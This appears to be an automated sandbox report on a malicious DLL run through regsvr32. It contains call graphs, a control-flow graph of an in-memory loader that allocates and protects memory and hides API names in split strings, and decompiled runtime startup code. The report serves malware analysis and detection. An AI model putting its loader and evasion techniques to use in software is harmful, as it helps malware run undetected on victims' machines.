1000a593 38765->38768 38769 10028d4a 38765->38769 38771 10028d14 38767->38771 38772 10028d2d LeaveCriticalSection 38767->38772 38768->38751 38788 10016544 RaiseException Concurrency::details::UMSFreeVirtualProcessorRoot::Activate 38768->38788 38813 10028aa4 63 API calls 2 library calls 38769->38813 38770 10028cdd 38770->38761 38812 10016544 RaiseException Concurrency::details::UMSFreeVirtualProcessorRoot::Activate 38770->38812 38771->38772 38773 10028d19 LeaveCriticalSection 38771->38773 38772->38769 38773->38765 38774 10028cc2 38774->38777 38811 10016544 RaiseException Concurrency::details::UMSFreeVirtualProcessorRoot::Activate 38774->38811 38790 100288ac EnterCriticalSection 38777->38790 38781 1000a5ba 38780->38781 38782 10028722 38780->38782 38781->38756 38789 10016544 RaiseException Concurrency::details::UMSFreeVirtualProcessorRoot::Activate 38781->38789 38817 10029974 38782->38817 38784 1002872a 38785 10028735 38784->38785 38787 1000a514 55 API calls 38784->38787 38786 10029a00 Concurrency::details::UMSFreeVirtualProcessorRoot::Activate LeaveCriticalSection RaiseException 38785->38786 38786->38781 38787->38785 38792 100288d0 38790->38792 38791 100289f9 LeaveCriticalSection 38791->38770 38793 10028923 38792->38793 38794 1002894e GlobalHandle GlobalUnlock 38792->38794 38806 100289e6 shared_ptr 38792->38806 38795 1002893f GlobalAlloc 38793->38795 38814 10009538 54 API calls Concurrency::details::UMSFreeVirtualProcessorRoot::Activate 38793->38814 38796 10028971 38794->38796 38797 1002897c GlobalReAlloc 38794->38797 38799 1002898e 38795->38799 38815 10009538 54 API calls Concurrency::details::UMSFreeVirtualProcessorRoot::Activate 38796->38815 38797->38799 38803 100289bb GlobalLock 38799->38803 38804 100289ab LeaveCriticalSection 38799->38804 38805 1002899c GlobalHandle GlobalLock 38799->38805 38803->38806 38816 100164fc RaiseException Concurrency::details::UMSFreeVirtualProcessorRoot::Activate 38804->38816 38805->38804 38806->38791 38810->38774 38813->38768 38818 10029983 38817->38818 38819 10029988 38817->38819 38827 10016544 RaiseException Concurrency::details::UMSFreeVirtualProcessorRoot::Activate 38818->38827 38821 10029997 38819->38821 38828 10029944 InitializeCriticalSection 38819->38828 38823 100299e6 EnterCriticalSection 38821->38823 38824 100299a8 EnterCriticalSection 38821->38824 38825 100299d9 LeaveCriticalSection 38824->38825 38826 100299bf InitializeCriticalSection 38824->38826 38825->38823 38826->38825 38828->38821 38830 1003b049 38829->38830 38834 1003b08e 38829->38834 38831 1003b05a 38830->38831 38830->38834 38840 1003af40 53 API calls sprintf_s 38831->38840 38833 1003b0a8 RtlAllocateHeap 38833->38834 38839 1003b0d5 38833->38839 38834->38833 38834->38839 38842 1003e830 FlsGetValue GetModuleHandleA GetProcAddress sprintf_s 38834->38842 38835 1003b05f 38841 1003c790 9 API calls 3 library calls 38835->38841 38838 1003b07d 38838->38641 38839->38641 38840->38835 38841->38838 38842->38834 38844 1003cce0 38843->38844 38845 1003cd0f 38844->38845 38846 1003ccfe 38844->38846 38863 1003c950 80 API calls 3 library calls 38845->38863 38862 1003c950 80 API calls 3 library calls 38846->38862 38849 1003cd0a 38849->38531 38850 1003cd16 38850->38531 38852 10038d29 38851->38852 38853 10038d34 38852->38853 38854 1003c590 RtlCaptureContext RtlLookupFunctionEntry 38852->38854 38853->38532 38855 1003c615 38854->38855 38856 1003c5d4 RtlVirtualUnwind 38854->38856 38857 1003c637 IsDebuggerPresent 38855->38857 38856->38857 38864 10047010 38857->38864 38859 1003c696 SetUnhandledExceptionFilter UnhandledExceptionFilter 38860 1003c6b4 Concurrency::details::UMSFreeVirtualProcessorRoot::Activate 38859->38860 38861 1003c6be GetCurrentProcess TerminateProcess 38859->38861 38860->38861 38861->38532 38862->38849 38863->38850 38864->38859 38865 1003b570 38880 10042ad0 38865->38880 38867 1003b59f 38869 1003cdf0 sprintf_s FlsGetValue GetModuleHandleA GetProcAddress 38867->38869 38879 1003b5dd 38867->38879 38868 1003b63f 38871 1003b643 38868->38871 38872 1003b65e 38868->38872 38873 1003b5ce 38869->38873 38870 100429a0 _isindst LeaveCriticalSection 38870->38868 38874 100429a0 _isindst LeaveCriticalSection 38871->38874 38875 1003cdf0 sprintf_s FlsGetValue GetModuleHandleA GetProcAddress 38873->38875 38876 1003b655 38874->38876 38875->38879 38877 1003b340 _isindst GetModuleHandleA GetProcAddress ExitProcess 38876->38877 38878 1003b65d 38877->38878 38878->38872 38879->38868 38879->38870 38881 10042af2 38880->38881 38882 10042b03 EnterCriticalSection 38880->38882 38886 100429c0 53 API calls 4 library calls 38881->38886 38884 10042af7 38884->38882 38887 1003b310 53 API calls 2 library calls 38884->38887 38886->38884 38888 1800010e8 38891 18001dbfc 38888->38891 38890 180001151 38896 18001dc49 38891->38896 38892 18001f803 38898 18002191c CreateProcessW 38892->38898 38895 18001f7d8 38895->38890 38896->38892 38896->38895 38897 1800171b8 CreateProcessW 38896->38897 38897->38896 38898->38895 38899 18000c85c 38900 18000c8c2 38899->38900 38903 1800178a8 38900->38903 38902 18000ca47 38905 180017939 38903->38905 38904 180017a02 CreateProcessW 38904->38902 38905->38904

                                                                              Executed Functions

                                                                              Function 10002200 Relevance: 2568.6, APIs: 5, Strings: 1461, Instructions: 3071memoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: AllocAllocateExitFreeHeapLibraryLoadProcessTaskVirtual
                                                                              • String ID: $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $!$!$!$!$!$!$!$!$!$!$"$"$"$"$"$"$"$#$#$#$#$#$#$#$#$$$$$$$$$$$$$$$$$$$$$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$'$'$'$'$'$'$'$($($($($($($($($($($($($($)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$*$*$*$*$*$*$*$*$*$*$*$*$+$+$+$+$+$+$+$+$+$+$+$+$+$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$-$-$-$-$-$-$-$.$.$.$.$.$/$/$/$/$/$/$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$1$1$1$1$1$1$1$1$1$1$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2r63IR60CP^ajP0sV0d2YCRrrvwmO$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$4$4$4$4$4$4$4$4$4$4$4$45655644$5$5$5$5$5$5$5$5$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$8$8$8$8$8$8$8$8$8$8$8192$9$9$9$9$9$9$9$9$9$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$<$<$<$<$<$<$<$<$<$<$=$=$=$=$=$=$=$=$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$@$@$@$@$@$@$@$@$@$@$@$@$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$B$B$B$B$B$B$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$F$F$F$F$F$F$F$F$F$F$F$G$G$G$G$G$H$H$H$H$H$H$H$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$J$J$J$J$J$J$J$J$J$K$K$K$L$L$L$L$L$L$L$L$M$M$M$M$N$N$N$N$N$N$N$N$N$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$T$T$T$T$T$T$U$U$U$U$U$U$U$U$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$X$X$X$X$X$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$[$[$[$[$[$[$[$[$[$[$\$\$\$\$\$\$\$\$]$]$]$]$]$]$]$]$]$]$]$]$^$^$^$^$^$^$^$^$_$_$_$_$_$_$_$_$_$_$`$`$`$`$`$`$`$`$`$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$c$c$c$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$d$d$d$d$e$e$e$e$e$e$e$e$e$e$e$e$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$h$h$h$h$h$h$i$i$i$i$i$i$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$k$k$k$k$k$k$k$k$k$k$k$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$m$m$m$m$n$n$n$n$n$n$n$n$o$o$o$o$o$o$p$p$p$p$p$p$p$p$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$werfault.exe$wwww$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$y$y$y$y$y$y$y$y$y$y$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z${${${${${${${${${${${${${${${${${${${${${${$|$|$|$|$|$|$|$|$|$|$|$}$}$}$}$}$}$}$}$}$}$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~
                                                                              • API String ID: 3650647564-1431788928
                                                                              • Opcode ID: a5b41f5cc347dc7459a940223d38cff2a1661eca541ddc93415a842a37ea01ab
                                                                              • Instruction ID: e8ffc78ebc3c10fe1a150ca543d797abf43348d4dd720eae87ce70da21d49f92
                                                                              • Opcode Fuzzy Hash: a5b41f5cc347dc7459a940223d38cff2a1661eca541ddc93415a842a37ea01ab
                                                                              • Instruction Fuzzy Hash: 98B3611250D7C1C8E332C23CA4587CFAE8193A3359F484299D3E41AADBC7AE9159DF67
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00130000 Relevance: 74.6, APIs: 4, Strings: 38, Instructions: 1094memoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 20 130000-130460 call 130aa8 * 2 VirtualAlloc 42 130462-130466 20->42 43 13048a-130494 20->43 44 130468-130488 42->44 46 130a91-130aa6 43->46 47 13049a-13049e 43->47 44->43 44->44 47->46 48 1304a4-1304a8 47->48 48->46 49 1304ae-1304b2 48->49 49->46 50 1304b8-1304bf 49->50 50->46 51 1304c5-1304d2 50->51 51->46 52 1304d8-1304e1 51->52 52->46 53 1304e7-1304f4 52->53 53->46 54 1304fa-130507 53->54 55 130531-130567 GetNativeSystemInfo 54->55 56 130509-130511 54->56 55->46 58 13056d-130589 VirtualAlloc 55->58 57 130513-130518 56->57 59 130521 57->59 60 13051a-13051f 57->60 61 1305a0-1305ac 58->61 62 13058b-13059e 58->62 64 130523-13052f 59->64 60->64 63 1305af-1305b2 61->63 62->61 66 1305c1-1305db 63->66 67 1305b4-1305bf 63->67 64->55 64->57 68 13061b-130622 66->68 69 1305dd-1305e2 66->69 67->63 71 1306db-1306e2 68->71 72 130628-13062f 68->72 70 1305e4-1305ea 69->70 73 13060b-130619 70->73 74 1305ec-130609 70->74 76 130864-13086b 71->76 77 1306e8-1306f9 71->77 72->71 75 130635-130642 72->75 73->68 73->70 74->73 74->74 75->71 80 130648-13064f 75->80 78 130871-13087f 76->78 79 130917-130929 76->79 81 130702-130705 77->81 86 13090e-130911 78->86 84 130a07-130a1a 79->84 85 13092f-130937 79->85 87 130654-130658 80->87 82 130707-13070a 81->82 83 1306fb-1306ff 81->83 88 130788-13078e 82->88 89 13070c-13071d 82->89 83->81 104 130a40-130a4a 84->104 105 130a1c-130a27 84->105 91 13093b-13093f 85->91 86->79 90 130884-1308a9 86->90 92 1306c0-1306ca 87->92 93 130794-1307a2 88->93 89->93 94 13071f-130720 89->94 122 130907-13090c 90->122 123 1308ab-1308b1 90->123 98 130945-13095a 91->98 99 1309ec-1309fa 91->99 96 13065a-130669 92->96 97 1306cc-1306d2 92->97 106 1307a8 93->106 107 13085d-13085e 93->107 103 130722-130784 94->103 100 13066b-130678 96->100 101 13067a-13067e 96->101 97->87 108 1306d4-1306d5 97->108 110 13097b-13097d 98->110 111 13095c-13095e 98->111 99->91 102 130a00-130a01 99->102 112 1306bd-1306be 100->112 113 130680-13068a 101->113 114 13068c-130690 101->114 102->84 103->103 117 130786 103->117 120 130a7b-130a8e 104->120 121 130a4c-130a54 104->121 118 130a38-130a3e 105->118 119 1307ae-1307d4 106->119 107->76 108->71 115 1309a2-1309a4 110->115 116 13097f-130981 110->116 124 130960-13096c 111->124 125 13096e-130979 111->125 112->92 127 1306b6-1306ba 113->127 130 130692-1306a3 114->130 131 1306a5-1306a9 114->131 132 1309a6-1309aa 115->132 133 1309ac-1309bb 115->133 128 130983-130987 116->128 129 130989-13098b 116->129 117->93 118->104 136 130a29-130a35 118->136 151 1307d6-1307d9 119->151 152 130835-130839 119->152 120->46 121->120 137 130a56-130a78 121->137 122->86 134 1308b3-1308b9 123->134 135 1308bb-1308c8 123->135 126 1309be-1309bf 124->126 125->126 140 1309c5-1309cb 126->140 127->112 128->126 129->115 138 13098d-13098f 129->138 130->127 131->112 139 1306ab-1306b3 131->139 132->126 133->126 141 1308ea-1308fe 134->141 142 1308d3-1308e5 135->142 143 1308ca-1308d1 135->143 136->118 137->120 146 130991-130997 138->146 147 130999-1309a0 138->147 139->127 148 1309d9-1309e9 VirtualProtect 140->148 149 1309cd-1309d3 140->149 141->122 159 130900-130905 141->159 142->141 143->142 143->143 146->126 147->140 148->99 149->148 156 1307e3-1307f0 151->156 157 1307db-1307e1 151->157 153 130844-130850 152->153 154 13083b 152->154 153->119 158 130856-130857 153->158 154->153 161 1307f2-1307f9 156->161 162 1307fb-13080d 156->162 160 130812-13082c 157->160 158->107 159->123 160->152 164 13082e-130833 160->164 161->161 161->162 162->160 164->151
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.941363859.0000000000130000.00000040.00001000.00020000.00000000.sdmp, Offset: 00130000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_130000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Virtual$Alloc$InfoNativeProtectSystem
                                                                              • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                              • API String ID: 2313188843-2517549848
                                                                              • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                              • Instruction ID: c3ad375b28d4005cd65bc3de3fd702d44b77b28fe8b76393b77b528eb6f720f0
                                                                              • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                              • Instruction Fuzzy Hash: CF72D470618B488FDB2ADF18C8956B9B7E1FB98305F10462DE8CAD7211DB34D986CB85
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10039160 Relevance: 15.2, APIs: 10, Instructions: 150memoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 165 10039160-1003916f 166 100392d6-100392d8 165->166 167 10039175-10039192 GetProcessHeap HeapAlloc 165->167 168 10039323-10039326 166->168 169 100392da-100392e2 166->169 170 10039194-100391a5 GetVersionExA 167->170 171 100391bb-100391c6 167->171 172 10039398-1003939b 168->172 173 10039328-10039337 call 1003e1e0 call 1003d420 168->173 169->171 176 100392e8-100392f7 169->176 174 100391c7-10039206 GetProcessHeap HeapFree 170->174 175 100391a7-100391b5 GetProcessHeap HeapFree 170->175 182 100393a4-100393b2 172->182 183 1003939d-1003939f call 1003d280 172->183 192 1003933c-10039342 173->192 178 10039208 174->178 179 1003920c-10039252 call 1003d610 174->179 175->171 180 100392f9 call 1003b6b0 176->180 181 100392fe-10039301 176->181 178->179 179->171 193 10039258-1003925f call 1003d2e0 179->193 180->181 181->182 187 10039307-10039322 call 1003d9f0 call 1003ce60 call 1003d670 181->187 183->182 192->171 195 10039348-10039359 FlsSetValue 192->195 204 10039261-10039286 call 1003e140 GetCommandLineA call 1003df50 call 1003d6a0 193->204 205 100392c5-100392d5 call 1003d670 193->205 198 10039384-10039397 call 10039620 195->198 199 1003935b-10039383 call 1003ceb0 GetCurrentThreadId 195->199 218 100392c0 call 1003ce60 204->218 219 10039288-1003928f call 1003de40 204->219 218->205 223 10039291-10039298 call 1003da80 219->223 224 100392bb call 1003d9f0 219->224 223->224 228 1003929a-1003929c call 1003b490 223->228 224->218 230 100392a1-100392a3 228->230 230->224 231 100392a5-100392ba 230->231
                                                                              C-Code - Quality: 48%
                                                                              			E10039160(void* __ebx, long* __edx, long* __rax, long long __rbx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, intOrPtr __r8, long long __r12, long long _a32) {
				long long _v8;
				long long _v16;
				long long _v24;
				long long _v32;
				void* _t23;
				intOrPtr _t27;
				long _t32;
				intOrPtr _t34;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t56;
				intOrPtr _t58;
				intOrPtr _t60;
				intOrPtr _t61;
				void* _t65;
				signed int _t78;
				signed int _t79;
				long _t80;
				long* _t90;
				void* _t98;
				long* _t103;
				long* _t106;
				intOrPtr _t108;
				intOrPtr _t110;
				intOrPtr _t112;
				long* _t114;
				void* _t116;
				intOrPtr _t118;
				void* _t119;
				void* _t120;
				void* _t121;

				_t117 = __r12;
				_t111 = __rbp;
				_t109 = __rsi;
				_t107 = __rdi;
				_t105 = __rdx;
				_t86 = __rax;
				_t71 = __edx;
				_t65 = __ebx;
				_a32 = __rbx;
				_t88 = __r8;
				if(__edx != 1) {
					__eflags = __edx;
					if(__edx != 0) {
						__eflags = __edx - 2;
						if(__edx != 2) {
							__eflags = __edx - 3;
							if(__edx == 3) {
								__eflags = 0;
								E1003D280(__rax, _t98);
							}
							goto L30;
						} else {
							E1003E1E0(_t23);
							_t27 = E1003D420(__rax, __r8, _t98, __rdx, __rdi, __rsi, __rbp, __r12); // executed
							__eflags = _t86;
							_t90 = _t86;
							if(_t86 == 0) {
								goto L4;
							} else {
								_t106 = _t86;
								__imp__FlsSetValue();
								__eflags = _t27;
								if(_t27 == 0) {
									E10039620(_t86, _t90);
									__eflags = 0;
									return 0;
								} else {
									__eflags = 0;
									E1003CEB0(_t86, _t90, _t90, _t106, _t107, _t109);
									_t32 = GetCurrentThreadId();
									_t90[2] = 0xffffffff;
									 *_t90 = _t32;
									return 1;
								}
							}
						}
					} else {
						_t34 =  *0x10074d28; // 0x0
						__eflags = _t34;
						if(_t34 <= 0) {
							goto L4;
						} else {
							__eflags =  *0x10074da8 - _t71; // 0x1
							 *0x10074d28 = _t34 - 1;
							if(__eflags == 0) {
								E1003B6B0(__rax, __r8, __rdx, __rdi, __rsi, __r12); // executed
							}
							__eflags = _t88;
							if(_t88 != 0) {
								L30:
								return 1;
							} else {
								E1003D9F0(_t88, _t107, _t109, _t111);
								E1003CE60(_t88, _t107, _t109, _t111, _t117);
								E1003D670();
								return _t88 + 1;
							}
						}
					}
				} else {
					GetProcessHeap();
					r8d = 0x94;
					HeapAlloc(??, ??, ??);
					_t95 = __rax;
					if(__rax == 0) {
						L4:
						return 0;
					} else {
						 *__rax = 0x94;
						if(GetVersionExA(??) != 0) {
							_v8 = __rbp;
							_t80 = __rax[2];
							_v16 = __rsi;
							_t79 = __rax[1];
							_v24 = __rdi;
							_v32 = __r12;
							r12d = __rax[4];
							_t78 = __rax[3] & 0x00007fff;
							GetProcessHeap();
							_t114 = __rax;
							_t103 = __rax;
							HeapFree(??, ??, ??);
							__eflags = r12d - 2;
							if(r12d != 2) {
								asm("bts edi, 0xf");
							}
							 *0x10074d4c = r12d;
							 *0x10074d58 = _t79;
							 *0x10074d5c = _t80;
							 *0x10074d50 = _t78;
							 *0x10074d54 = (_t79 << 8) + _t80; // executed
							_t49 = E1003D610(1, _t86); // executed
							_t118 = _v32;
							__eflags = _t49;
							_t108 = _v24;
							_t110 = _v16;
							_t112 = _v8;
							if(__eflags == 0) {
								goto L4;
							} else {
								_t50 = E1003D2E0(0, __eflags, _t86, _t103, _t105, _t108, _t110, _t118, _t119); // executed
								__eflags = _t50;
								if(_t50 == 0) {
									L16:
									E1003D670();
									__eflags = 0;
									return 0;
								} else {
									E1003E140(_t95, _t108);
									GetCommandLineA();
									 *0x100774c8 = _t86; // executed
									E1003DF50(_t65, _t80, _t86, _t95, _t108, _t110, _t112, _t118); // executed
									 *0x10074d30 = _t86;
									_t56 = E1003D6A0(_t78, _t95, _t105, _t108, _t110, _t114, _t118, _t119, _t120, _t121);
									__eflags = _t56;
									if(_t56 < 0) {
										L15:
										E1003CE60(_t95, _t108, _t110, _t112, _t118);
										goto L16;
									} else {
										_t58 = E1003DE40(_t95, _t108, _t110, _t114, _t118, _t119, _t120);
										__eflags = _t58;
										if(_t58 < 0) {
											L14:
											E1003D9F0(_t95, _t108, _t110, _t112);
											goto L15;
										} else {
											_t60 = E1003DA80(1, _t86, _t95, _t108, _t110, _t112, _t114, _t116, _t118);
											__eflags = _t60;
											if(_t60 < 0) {
												goto L14;
											} else {
												_t61 = E1003B490(0, _t86, _t95, _t105, _t108, _t114); // executed
												__eflags = _t61;
												if(_t61 != 0) {
													goto L14;
												} else {
													 *0x10074d28 =  *0x10074d28 + 1;
													__eflags =  *0x10074d28;
													return 1;
												}
											}
										}
									}
								}
							}
						} else {
							GetProcessHeap();
							HeapFree(??, ??, ??);
							goto L4;
						}
					}
				}
			}


































                                                                              0x10039160
                                                                              0x10039160
                                                                              0x10039160
                                                                              0x10039160
                                                                              0x10039160
                                                                              0x10039160
                                                                              0x10039160
                                                                              0x10039160
                                                                              0x10039167
                                                                              0x1003916c
                                                                              0x1003916f
                                                                              0x100392d6
                                                                              0x100392d8
                                                                              0x10039323
                                                                              0x10039326
                                                                              0x10039398
                                                                              0x1003939b
                                                                              0x1003939d
                                                                              0x1003939f
                                                                              0x1003939f
                                                                              0x00000000
                                                                              0x10039328
                                                                              0x10039328
                                                                              0x10039337
                                                                              0x1003933c
                                                                              0x1003933f
                                                                              0x10039342
                                                                              0x00000000
                                                                              0x10039348
                                                                              0x1003934e
                                                                              0x10039351
                                                                              0x10039357
                                                                              0x10039359
                                                                              0x10039387
                                                                              0x1003938c
                                                                              0x10039397
                                                                              0x1003935b
                                                                              0x1003935b
                                                                              0x10039360
                                                                              0x10039365
                                                                              0x1003936b
                                                                              0x10039373
                                                                              0x10039383
                                                                              0x10039383
                                                                              0x10039359
                                                                              0x10039342
                                                                              0x100392da
                                                                              0x100392da
                                                                              0x100392e0
                                                                              0x100392e2
                                                                              0x00000000
                                                                              0x100392e8
                                                                              0x100392eb
                                                                              0x100392f1
                                                                              0x100392f7
                                                                              0x100392f9
                                                                              0x100392f9
                                                                              0x100392fe
                                                                              0x10039301
                                                                              0x100393a4
                                                                              0x100393b2
                                                                              0x10039307
                                                                              0x10039307
                                                                              0x1003930c
                                                                              0x10039311
                                                                              0x10039322
                                                                              0x10039322
                                                                              0x10039301
                                                                              0x100392e2
                                                                              0x10039175
                                                                              0x10039175
                                                                              0x1003917d
                                                                              0x10039186
                                                                              0x1003918f
                                                                              0x10039192
                                                                              0x100391bb
                                                                              0x100391c6
                                                                              0x10039194
                                                                              0x10039197
                                                                              0x100391a5
                                                                              0x100391c7
                                                                              0x100391cc
                                                                              0x100391cf
                                                                              0x100391d4
                                                                              0x100391d7
                                                                              0x100391df
                                                                              0x100391e4
                                                                              0x100391e8
                                                                              0x100391ee
                                                                              0x100391f4
                                                                              0x100391f9
                                                                              0x100391fc
                                                                              0x10039202
                                                                              0x10039206
                                                                              0x10039208
                                                                              0x10039208
                                                                              0x10039213
                                                                              0x1003921d
                                                                              0x10039223
                                                                              0x1003922b
                                                                              0x10039231
                                                                              0x10039237
                                                                              0x1003923c
                                                                              0x10039241
                                                                              0x10039243
                                                                              0x10039248
                                                                              0x1003924d
                                                                              0x10039252
                                                                              0x00000000
                                                                              0x10039258
                                                                              0x10039258
                                                                              0x1003925d
                                                                              0x1003925f
                                                                              0x100392c5
                                                                              0x100392c5
                                                                              0x100392ca
                                                                              0x100392d5
                                                                              0x10039261
                                                                              0x10039261
                                                                              0x10039266
                                                                              0x1003926c
                                                                              0x10039273
                                                                              0x10039278
                                                                              0x1003927f
                                                                              0x10039284
                                                                              0x10039286
                                                                              0x100392c0
                                                                              0x100392c0
                                                                              0x00000000
                                                                              0x10039288
                                                                              0x10039288
                                                                              0x1003928d
                                                                              0x1003928f
                                                                              0x100392bb
                                                                              0x100392bb
                                                                              0x00000000
                                                                              0x10039291
                                                                              0x10039291
                                                                              0x10039296
                                                                              0x10039298
                                                                              0x00000000
                                                                              0x1003929a
                                                                              0x1003929c
                                                                              0x100392a1
                                                                              0x100392a3
                                                                              0x00000000
                                                                              0x100392a5
                                                                              0x100392a5
                                                                              0x100392a5
                                                                              0x100392ba
                                                                              0x100392ba
                                                                              0x100392a3
                                                                              0x10039298
                                                                              0x1003928f
                                                                              0x10039286
                                                                              0x1003925f
                                                                              0x100391a7
                                                                              0x100391a7
                                                                              0x100391b5
                                                                              0x00000000
                                                                              0x100391b5
                                                                              0x100391a5
                                                                              0x10039192

                                                                              APIs
                                                                              • GetProcessHeap.KERNEL32 ref: 10039175
                                                                              • HeapAlloc.KERNEL32 ref: 10039186
                                                                              • GetVersionExA.KERNEL32 ref: 1003919D
                                                                              • GetProcessHeap.KERNEL32 ref: 100391A7
                                                                              • HeapFree.KERNEL32 ref: 100391B5
                                                                                • Part of subcall function 1003D9F0: DeleteCriticalSection.KERNEL32(?,?,?,?,1003930C), ref: 1003DA39
                                                                                • Part of subcall function 1003CE60: FlsFree.KERNEL32(?,?,?,?,10039311), ref: 1003CE6F
                                                                                • Part of subcall function 1003CE60: TlsFree.KERNEL32(?,?,?,?,10039311), ref: 1003CE8A
                                                                                • Part of subcall function 1003D670: HeapDestroy.KERNEL32(?,?,?,?,10039316), ref: 1003D67B
                                                                              • GetProcessHeap.KERNEL32 ref: 100391EE
                                                                              • HeapFree.KERNEL32 ref: 100391FC
                                                                              • GetCommandLineA.KERNEL32 ref: 10039266
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
